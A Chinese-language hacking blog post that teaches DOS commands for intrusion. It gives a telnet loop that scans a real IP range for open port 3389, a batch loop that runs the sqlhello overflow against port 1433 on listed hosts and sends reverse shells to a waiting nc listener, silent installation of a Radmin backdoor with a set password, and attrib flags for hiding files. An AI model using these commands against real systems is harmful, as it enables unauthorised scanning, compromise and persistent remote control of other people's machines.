DOS命令也疯狂
DOS命令也疯狂
在早期的Hack世界中,大多是使用DOS命令,DOS命令功能强大,而且在肉鸡的反弹Shell上执行时,不会留下痕迹。从严格意义上讲,目前很多入侵都要借助DOS命令。例如在SQL注入中使用echo命令,将一句话木马写入到网站目录下,利用echo命令写入ftp执行脚本文件,当然还有很多啦,例如使用sql hello漏洞等来进行溢出时,也是在DOS状态下执行命令,并最终控制肉鸡,尽管目前有很多黑客软件,但是如果能够深入了解并掌握一些DOS命令,呵呵,那是一件比较爽的事情,不多说了,还是言归正传,要不wtf的板砖要过来了。
1.DOS扫描端口
DOS命令来扫描?很多人都不相信,其实网上我曾经看过一篇帖子,其中谈到过使用DOS命令来扫描,但是没有细谈,也没有讲清楚,看了以后也是云里雾里。其实使用DOS命令来扫描很简单,主要是借助Dos命令中的For命令。
FOR %variable IN (set) DO command [command-parameters]
%variable 指定可替换的参数。
(set) 指定一个或一组文件,可以使用通配符,这个里面常常是以数字出现,例如(1,1,2,50),表示从1开始,50结束,按2为步长进行增长。
command 指定对每个文件执行的命令。
command-parameters 对特定命令所指定的参数。
举一个例子,扫描210.76.36.1~210.76.36.254段开放3389端口的计算机,在DOS提示符下输入:
for /l %a in (1,1,254) do start /min /low telnet 210.76.36.%a 3389
start参数中的min表示窗口开始时最小化,low表示程序运行时的优先级。如果start后不跟参数则运行后会生成一个新的DOS窗口,start具体的参数使用可是使用“start /?”查看。“telnet 210.76.36.%a 3389”表示一个命令,从%a参数中读取IP地址的最后一个数字。其运行原理就是将IP值做成循环,避免手工输入,运行结果如图1所示。运行命令后,会在任务栏上开254个小窗口,然后telnet链接失败的窗口会在大约5秒后自动退出,开放3389端口的IP地址会在telnet窗口显示。
说明:使用DOS命令可以用来扫描,但是扫描效果不好,如果设置的范围太多,将占用系统太多的资源,而且对于IP地址的记录也是基于手工的。
2.批量获得肉鸡
for /f %I in (IP地址列表文件) do sqlhello %I 1433 要返回的IP地址 返回端口
例如:使用sqlhello程序批量溢出IP地址列表文件为IP.txt
for /f %I in (d:\ip.txt) do sqlhello %I 1433 192.168.1.13 8080
运行结果如图2所示,sqlhello.exe程序会从IP.txt文件中读取IP地址并进行1433端口的溢出。
说明:IP.txt文件中一个ip地址为一行,其中sqlhello.exe必须是DOS的当前运行路径下,另外需要使用nc –l –p 8080来监听反弹的端口。其实这个命令还可以进行扩展,只要是对成批的IP地址进行操作都可以使用For命令来执行。
sqlh 210.94.92.90 1433 218.69.98.37 8080
以上命令只能在win2000下使用,因为/l累加参数是win2000对for的扩展当然winXP和win.NET都可以用,winME我没有试过,因为没有winME的机器
3.列出系统环境变量
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %I
4、记录终端访问IP地址
在系统目录的login.cmd中加入以下命令,当使用远程终端服务登陆时,会自动记录IP地址。
netstat -n -p tcp |find "3389" >>3389.log
date /t>> c:\3389.log
time /t>>c:\3389.log
5.使用DOS命令安装r_server
netstat -an |find "3373"
net stop r_server
regsrc.exe /pass:hacker2005 /port:3373 /save /silence
regsrc.exe /install /silence
net start r_server
net start r_server
netstat -an |find "3373"
6.导入指定的注入表文件到注册表中
regedit /s radmin.reg
7.常用DOS命令
(1) net stop “服务名称”,停止该服务。例如停止r_server,net stop r_server。
(2) net start “服务名称”,启动该服务。
(3) move 文件 位置1,将文件移动到位置1。如“move c:\1.asp d\web\”将C盘1.asp文件移动到D盘web目录下。
(4) attrib 查看文件属性命令,常常跟“+h +s +r”将文件设为隐藏,系统,只读属性。
|
simeon2005
博客统计信息
热门文章
最新评论
友情链接
